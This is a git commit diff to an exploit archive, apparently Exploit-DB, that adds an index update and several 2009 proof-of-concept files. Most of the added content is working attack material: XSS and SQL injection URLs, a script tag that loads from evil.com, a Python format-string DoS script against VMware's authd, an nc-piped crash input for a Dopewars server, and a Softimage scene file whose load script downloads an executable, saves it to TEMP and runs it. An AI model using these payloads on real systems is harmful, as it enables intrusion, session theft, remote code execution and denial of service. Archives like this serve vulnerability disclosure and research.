Updated 05_11_2014

2014-05-11 04:36:48 +00:00 · 2014-05-11 04:36:48 +00:00 · 1e3a506495
commit 1e3a506495
parent cd337ecfaf
16 changed files with 254 additions and 28 deletions
--- a/files.csv
+++ b/files.csv
@ -2767,7 +2767,7 @@ id,file,description,date,author,platform,type,port
 3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0
 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0
 3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0
-3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0
+3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0
 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability",2007-01-07,bd0rk,php,webapps,0
 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0
 3099,platforms/linux/remote/3099.pm,"Berlios GPSD <= 2.7 - Remote Format String Exploit (meta)",2007-01-08,Enseirb,linux,remote,2947
@ -20890,7 +20890,7 @@ id,file,description,date,author,platform,type,port
 23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
-23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
+23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0
 23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 Remote Send File Request Denial of Service Vulnerability",2004-02-16,"intuit e.b.",windows,dos,0
 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0
@ -29991,3 +29991,16 @@ id,file,description,date,author,platform,type,port
 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0
 33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0
 33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0
+33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0
+33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 'REQUESTJET' Message Remote Denial of Service Vulnerability",2009-10-15,"Doug Prostko",linux,dos,0
+33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability",2009-10-13,Skylined,windows,remote,0
+33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 'vmware-authd' Remote Denial of Service Vulnerability",2009-10-07,shinnai,windows,dos,0
+33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability",2009-10-23,"Sebastian Tello",windows,remote,0
+33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability",2009-11-23,"Diego Juarez",windows,remote,0
+33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 'LunaSysMgr' Service Denial of Service Vulnerability",2009-10-13,"Townsend Ladd Harris",hardware,dos,0
+33281,platforms/php/webapps/33281.txt,"Achievo 1.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0
+33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0
+33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0
+33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 'run?__report' Parameter Cross Site Scripting Vulnerability",2009-10-14,"Michele Orru",java,webapps,0
+33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability",2009-10-15,"drunken danish rednecks",php,webapps,0
+33288,platforms/php/webapps/33288.txt,"Zainu 1.0 'searchSongKeyword' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
--- a/platforms/asp/webapps/33268.html
+++ b/platforms/asp/webapps/33268.html
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36605/info
+
+AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+AfterLogic WebMail Pro 4.7.10 and prior versions are affected. 
+
+<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html> 
--- a/platforms/hardware/dos/33280.txt
+++ b/platforms/hardware/dos/33280.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36659/info
+
+Palm WebOS is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data.
+
+Attackers can leverage this issue to cause an affected device to reboot. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Palm WebOS 1.1 is vulnerable; other versions may also be affected. 
+
+<meta http-equiv="refresh" content="1">AAAAA... using 50280 or more characters after the refresh. 
--- a/platforms/java/webapps/33286.txt
+++ b/platforms/java/webapps/33286.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36674/info
+
+Eclipse BIRT (Business Intelligence and Reporting Tools) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Eclipse BIRT 2.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660
--- a/platforms/linux/dos/33269.txt
+++ b/platforms/linux/dos/33269.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36606/info
+
+Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects Dopewars 1.5.12; other versions may also be affected. 
+
+The following exploit is available:
+
+ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 
--- a/platforms/multiple/webapps/33284.txt
+++ b/platforms/multiple/webapps/33284.txt
@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/36672/info
+
+Pentaho BI is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly validate user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The attacker may also exploit these issues to obtain sensitive session information.
+
+Pentaho BI 1.7.0.1062 is vulnerable; other versions may also be affected. 
+
+GET /pentaho/ViewAction?&
+outputType=khgj345<script>alert('Pwnd')</script>kjh3535
+&solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis
+HTTP/1.0
+User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
+Host: demo1.opentaps.org:8181
+Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
+image/png, image/jpeg,
+image/gif, image/x-xbitmap, */*;q=0.1
+Accept-Language: it-IT,it;q=0.9,en;q=0.8
+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
+Referer: http://www.example.com:8181/pentaho/ViewAction?solution=opentaps&path=
+Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
+Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
+Cookie2: $Version=1
+Proxy-Connection: Keep-Alive
--- a/platforms/php/webapps/3096.txt
+++ b/platforms/php/webapps/3096.txt
@ -1,26 +1,26 @@
-/###################################################################\
-#                          AllMyLinks 0.5.0                         #
-#    =========================================================      #
-#    Published :  2007-01-07                                        #
-#    Remote: Yes                                                    #
-#    Site: http://download.php-resource.net/AllMyLinks/AllMyLinks0.5.0.zip
-#####################################################################
-#    Author: GolD_M                                                 #
-#    Contact: HackEr_@W.CN                                          #
-#    =====================================================          #
-#    ThanX = All My Friends & ABDULLAH00 & MilW0rm.Com              #
-#    SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                #
-\###################################################################/
-In :
-/index.php
-Line:
-/77
-Vulnerable Code:
-/include("$AML_opensite");
-3xpl!T
-/index.php?AML_opensite=[Ev!L_Scr!pT]
-/#######################################\
-#         Tryag.Com & Dwrat.Com         #
-\#######################################/
-
-# milw0rm.com [2007-01-07]
+/###################################################################\
+#                          AllMyLinks 0.5.0                         #
+#    =========================================================      #
+#    Published :  2007-01-07                                        #
+#    Remote: Yes                                                    #
+#    Site: http://download.php-resource.net/AllMyLinks/AllMyLinks0.5.0.zip
+#####################################################################
+#    Author: GolD_M                                                 #
+#    Contact: HackEr_@W.CN                                          #
+#    =====================================================          #
+#    ThanX = All My Friends & ABDULLAH00 & MilW0rm.Com              #
+#    SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                #
+\###################################################################/
+In :
+/index.php
+Line:
+/77
+Vulnerable Code:
+/include("$AML_opensite");
+3xpl!T
+/index.php?AML_opensite=[Ev!L_Scr!pT]
+/#######################################\
+#         Tryag.Com & Dwrat.Com         #
+\#######################################/
+
+# milw0rm.com [2007-01-07]
--- a/platforms/php/webapps/33281.txt
+++ b/platforms/php/webapps/33281.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36661/info
+
+Achievo is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Versions prior to Achievo 1.4.0 are affected. 
+
+<SCRIPT SRC=//evil.com/xss.js></SCRIPT>
+
+
+http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert(&#039;xss&#039;);</script>&atksearchmode[customer]=substring
--- a/platforms/php/webapps/33282.txt
+++ b/platforms/php/webapps/33282.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36663/info
+
+Dream Poll is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dream Poll 3.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>?><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>
+http://www.example.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
+http://www.example.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20
--- a/platforms/php/webapps/33287.txt
+++ b/platforms/php/webapps/33287.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36700/info
+
+bloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input passed through the 'search' parameter.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects bloofoxCMS 0.3.5; other versions may be vulnerable as well.
+
+http://www.example.com/search.5.html?search=x%27%22%3E%3Cscript%3Ealert(%22redneck%22)%3C/script%3E 
--- a/platforms/php/webapps/33288.txt
+++ b/platforms/php/webapps/33288.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36701/info
+
+Zainu is prone to a cross-site scripting vulnerability in the Contact module because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Zainu 1.0; other versions may be vulnerable as well.
+
+http://www.example.com/demo/index.php?view=SearchSong&searchSongKeyword=buurp%22%27%3E%3Cscript%3Ealert(%22BUUURP%21%21%22)%3C/script%3E 
--- a/platforms/windows/dos/33271.py
+++ b/platforms/windows/dos/33271.py
@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/36630/info
+
+VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input.
+
+An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.
+
+NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue.
+
+# ----------------------------------------------------------------------------
+# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
+# url: http://www.vmware.com/
+#
+# author: shinnai
+# mail: shinnai[at]autistici[dot]org
+# site: http://www.shinnai.net
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Tested on Windows XP Professional Ita SP3 full patched
+# ----------------------------------------------------------------------------
+
+# usage: C:\>exploit.py 127.0.0.1 912
+
+import socket
+import time
+import sys
+
+host = str(sys.argv[1])
+port = int(sys.argv[2])
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    conn = s.connect((host, port))
+    d = s.recv(1024)
+    print "Server <- " + d
+
+    s.send('USER \x25\xFF \r\n')
+    print 'Sending command "USER" + evil string...'
+    d = s.recv(1024)
+    print "Server response <- " + d
+
+    s.send('PASS \x25\xFF \r\n')
+    print 'Sending command "PASS" + evil string...'
+    try:
+        d = s.recv(1024)
+        print "Server response <- " + d
+    except:
+        print "\nExploit completed..."
+except:
+    print "Something goes wrong honey..."
--- a/platforms/windows/local/29922.py
+++ b/platforms/windows/local/29922.py
@ -14,6 +14,9 @@
 # This scripts creates a .wps file which exploits the vulnerability described in
 # CVE-2013-3934 and bypasses SafeSEH protection

+## Exploit-DB Note: Python v2 only. 
+
+
 from struct import pack

 file="exploit.wps"
--- a/platforms/windows/remote/33270.txt
+++ b/platforms/windows/remote/33270.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36622/info
+
+Microsoft Internet Explorer is prone to a remote code-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions. 
+
+HTTP/.\nContent-Encoding:deflate\r\t\n\r\n\x20\x20
+
+HTTP \nContent-Encoding:deflate\nContent-Range:\n\n”
--- a/platforms/windows/remote/33272.txt
+++ b/platforms/windows/remote/33272.txt
@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/36634/info
+
+Autodesk 3ds Max is prone to a vulnerability that lets attackers execute arbitrary commands in the context of the vulnerable application.
+
+This issue affects the following:
+
+3ds Max 6 through 9
+3ds Max 2008 through 2010
+
+Other versions may also be vulnerable. 
+
+The following proof-of-concept code is available:
+
+callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")") id:#mbLoadCallback persistent:true
--- a/platforms/windows/remote/33273.scn
+++ b/platforms/windows/remote/33273.scn
@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/36637/info
+
+Autodesk Softimage is prone to a remote code-execution vulnerability.
+
+Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. 
+
+<PostLoadScript>
+      <Language>JScript</Language>
+      <Function></Function>
+      <Script_Content>
+    <![cdata[
+var s=new ActiveXObject('WScript.Shell');
+var o=new ActiveXObject('ADODB.Stream');
+var e=s.Environment('Process');
+var u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
+var b=e.Item('TEMP')+'agent.exe';
+var x=new ActiveXObject('Microsoft.XMLHTTP');
+//x=new ActiveXObject('MSXML2.ServerXMLHTTP');
+if(!x)
+    exit(0);
+x.open('GET',u,0);
+x.send(null);
+o.Type=1;
+o.Mode=3;
+o.Open();
+o.Write(x.responseBody);
+o.SaveToFile(b,2);
+s.Run(b,0);
+    ]] >
+  </Script_Content>
+  </PostLoadScript>